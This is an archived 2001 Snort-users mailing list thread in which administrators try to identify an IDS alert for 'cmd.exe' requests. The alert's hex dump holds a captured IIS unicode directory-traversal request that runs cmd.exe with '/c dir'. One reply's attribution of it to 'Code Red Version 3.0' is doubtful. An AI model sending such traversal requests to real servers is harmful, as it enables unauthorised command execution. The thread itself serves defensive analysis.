Snort mailing list archives

RE: Cmd.exe requests

From: Anthony Geoffron <anthonyg () passinglane com>
Date: Mon, 6 Aug 2001 13:08:08 -0700

it seems to be Code Red Version 3.0

-----Original Message-----
From: ktimm () server1 stingrey com [mailto:ktimm () server1 stingrey com]
Sent: Monday, August 06, 2001 12:48 PM
To: Tom Sevy
Cc: snort-users () lists sourceforge net
Subject: Re: [Snort-users] Cmd.exe requests

It is probobly an automated unicode style scanner. Most check for
vulnerability by doing a dir and seeing if it rueturns correct error
codes. 

On Mon, 6 Aug 2001, Tom Sevy wrote:

Does the following payload indicate any known worm?  Or just a cmd.exe
attempt?  I have been seeing a lot of these.





Generated by ACID v0.9.6b13 on Mon August 06, 2001 15:03:52

----------------------------------------------------------------------------

--
#(1 - 61331) [2001-08-03 15:55:03]  WEB-IIS cmd.exe access
IPv4: 63.202.158.22 -> 208.248.231.103
      hlen=5 TOS=0 dlen=106 ID=52091 flags=0 offset=0 TTL=241 chksum=10193
TCP:  port=33837 -> dport: 80  flags=***AP*** seq=2524555147
      ack=14124627 off=5 res=0 win=8760 urp=0 chksum=32756
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users



_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

Current thread:

Cmd.exe requests Tom Sevy (Aug 06)
- Re: Cmd.exe requests ktimm (Aug 06)
- Re: Cmd.exe requests Jason (Aug 06)
  - Re: Cmd.exe requests Ryan Russell (Aug 06)
- <Possible follow-ups>
- RE: Cmd.exe requests Anthony Geoffron (Aug 06)